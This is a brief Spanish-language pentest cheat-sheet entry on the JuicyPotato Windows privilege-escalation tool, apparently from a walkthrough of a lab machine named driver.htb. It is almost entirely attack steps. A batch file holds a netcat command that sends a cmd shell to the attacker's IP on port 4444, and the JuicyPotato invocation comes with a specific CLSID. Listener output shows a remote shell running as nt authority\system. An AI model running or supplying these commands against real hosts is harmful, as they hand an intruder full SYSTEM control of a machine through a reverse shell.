# JuicyPotato

{% embed url="<https://github.com/ohpe/juicy-potato>" %}

rs.bat

```
C:\Users\adm1n\Documents\nc.exe 10.10.16.13 4444 -e cmd
```

Luego, ejecutamos:

```
.\JuicyPotato.exe -t * -p C:\Users\adm1n\Documents\rs.bat -l 9002 -c '{4991d34b-80a1-4291-83b6-3328366b9097}'
```

Luego en el puerto de escucha:

```
listening on [any] 4444 ...
connect to [10.10.16.13] from driver.htb [10.10.11.106] 49465
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```